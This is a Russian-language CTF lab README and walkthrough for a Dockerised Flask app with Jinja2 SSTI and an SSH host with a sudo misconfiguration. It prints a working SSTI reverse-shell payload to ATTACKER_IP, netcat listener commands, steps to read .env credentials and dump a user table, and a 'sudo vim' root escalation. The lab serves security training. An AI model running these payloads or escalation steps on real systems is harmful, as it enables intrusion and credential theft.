## 📦 Запуск

Для запуска задания необходимо воспользоваться `startup.sh`, который поднимает инфраструктуру с помощью `docker-compose`:

```bash
chmod +x startup.sh
./startup.sh
```

Будут развернуты следующие сервисы:

- `flask` — уязвимое веб-приложение с SSTI.
- `db` — база данных PostgreSQL.
- `ssh_server` — машина с пользователем `user2`, имеющим повышенные права.

---

## 🕳️ Уязвимости

### 1. Server-Side Template Injection (SSTI)

На сайте реализована форма для отправки отзывов. Однако ввод пользователя небезопасно обрабатывается через `render_template_string`, что делает сайт уязвимым к SSTI.

### 2. Избыточные привилегии пользователя

Пользователь `user2` может выполнять несколько команд с помощью `sudo` без ввода пароля, включая `vim`, что позволяет получить root-доступ:

```bash
sudo vim -c '!bash'
```

---

## 🚩 Пошаговое прохождение

### 1. Получение Reverse Shell через SSTI

Вставь payload в строку URL:

```jinja
{{''.__class__.mro()[1].__subclasses__()[ID]("bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'",shell=True,stdout=-1).communicate()[0].strip()}}
```

- Замените `ATTACKER_IP` на gateway вашей `docker-compose` сети. Его можно найти через:

```bash
docker network inspect <network_name>
```

- Пример прослушивания:

```bash
nc -lvnp 4444
```

- Чтобы найти нужный ID для `subclasses()`, используйте:

```jinja
{{''.__class__.__base__.__subclasses__()}}
```

### 2. Поиск флага пользователя и .env

После получения shell от пользователя `webuser`, выполни:

```bash
ls -la
cat user.txt         # флаг пользователя
cat .env             # учетные данные для PostgreSQL
```

### 3. Подключение к базе данных

```bash
psql -h db -U ctf_user -d ctf_db
```

- Посмотреть таблицы:

```sql
\dt
```

- Получить данные пользователя:

```sql
SELECT * FROM users;
```

### 4. Подключение по SSH

Используй полученные учетные данные:

```bash
ssh user2@localhost -p 2222
```

Введи пароль пользователя `user2`.

### 5. Эскалация привилегий через sudo

Посмотреть доступные команды:

```bash
sudo -l
```

Если `vim` доступен без пароля:

```bash
sudo vim -c '!bash'
```

Теперь ты root. Получи root-флаг:

```bash
cat /root/root.txt
```

---

## 🧠 Полезные команды

```bash
ls -la
ps aux
whoami
```

---

## ✅ Флаги

- `user.txt` — в домашней директории `webuser`.
- `root.txt` — в директории `/root`, доступен только после эскалации.## Используемые уязвимости

В данной CTF реализованы следующие уязвимости:

1. **Server-Side Template Injection (SSTI)**  
   Веб-приложение на Flask уязвимо к внедрению шаблонов через Jinja2, что позволяет выполнять произвольный код на сервере и получить доступ к командной оболочке.

2. **Избыточные права sudo у пользователя**  
   Пользователь `user2` имеет право запускать `vim`, `less`, `tail`, `find` с помощью `sudo` без ввода пароля. Это позволяет использовать данные команды для обхода ограничений и выполнения команд от имени суперпользователя (root).